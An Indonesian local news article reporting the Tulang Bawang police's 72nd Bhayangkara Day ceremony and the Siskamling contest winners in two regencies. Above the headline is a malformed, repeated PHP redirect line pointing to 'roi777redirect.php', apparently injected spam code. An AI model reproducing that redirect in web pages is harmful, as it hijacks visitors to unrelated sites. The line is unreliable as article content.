header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Kapolres Tulang Bawang Pimpin Upacara Hari Bhayangkara ke 72 dan Beri Hadiah Kepada Pemenang Lomba Siskamling -
Kapolres Tulang Bawang Pimpin Upacara Hari Bhayangkara ke 72 dan Beri Hadiah Kepada Pemenang Lomba Siskamling

TRANSLAMPUNG.COM, MENGGALA – Kapolres Tulang Bawang AKBP Raswanto Hadiwibowo, SIK, M.Si memimpin langsung pelaksanaan upacara Hari Bhayangkara ke 72, pada Rabu (11/7) sekira pukul 08.00 WIB, bertempat di Lapangan Upacara Mapolres Tulang Bawang.

Pada kesempatan ini, Kapolres membacakan Amanat Presiden Republik Indonesia Ir. Joko Widodo. Dalam amanat tersebut, presiden menyampaikan ucapan selamat Hari Bhayangkara ke 72 dan memberikan apresiasi yang setinggi-tingginya, atas berbagai prestasi yang telah diukir Polri dalam mengemban tugas sebagai pemelihara keamanan dalam negeri.

Adapun peserta yang mengikuti upacara, terdiri dari satu peleton dari TNI AD, satu peleton dari Brimob, satu peleton dari Satsabhara, satu peleton dari Satlantas, dua peleton Bhabinkamtibmas, satu peleton gabungan dari Satreskrim, Satintelkam dan Satnarkoba, satu peleton dari PNS Polri dan satu peleton dari Senkom.

Usai pelaksanaan upacara, langsung diumumkan para pemenang lomba Siskamling (sistem keamanan lingkungan) untuk memperingati Hari Bhayangkara ke 72 di Kabupaten Tulang Bawang dan Kabupaten Tulang Bawang Barat.

“Untuk Kabupetan Tulang Bawang, Juara I diraih oleh Kampung Sido Mekar, Kecamatan Gedung Aji Baru, Juara II diraih oleh Kampung Karya Jitu Mukti, Kecamatan Rawa Jitu Selatan, Juara III diraih oleh Kampung Cempaka Jaya, Kecamatan Menggala Timur, Juara Harapan I diraih oleh Kampung Jaya Makmur, Kecamatan Banjar Baru, Juara Harapan II diraih Kampung Bumi Sari, Kecamatan Rawa Pitu dan Juara Harapan III diraih Kampung Dente Makmur, Kecamatan Dente Teladas,” ujar AKBP Raswanto.

Lanjutnya, untuk Kabupaten Tulang Bawang Barat, Juara I diraih oleh Tiyuh Margo Mulyo, Kecamatan Tumijajar, Juara II diraih oleh Tiyuh Indraloka Jaya, Kecamatan Way Kenanga, Juara III diraih oleh Tiyuh Bujung Sari Marga, Kecamatan Pagar Dewa, Juara Harapan I diraih oleh Tiyuh Terang Bumi Agung, Kecamatan Gunung Terang, Juara Harapan II diraih oleh Tiyuh Gading Kencana, Kecamatan Tulang Bawang Udik dan Juara Harapan III diraih oleh Tiyuh Indraloka Mukti, Kecamatan Way Kenanga.

“Para pemenang lomba Siskamling, diberikan tropi, piagam penghargaan dan uang pembinaan dari Satbinmas Polres Tulang Bawang,” terang AKBP Raswanto.

Tampak hadir dalam kegiatan ini, Kapolres Tulang Bawang, PJU Polres Tulang Bawang, Kapolsek jajaran, Forkopimda Kabupaten Tulang Bawang dan Tulang Bawang Barat serta tamu undangan.(als)

News Reporter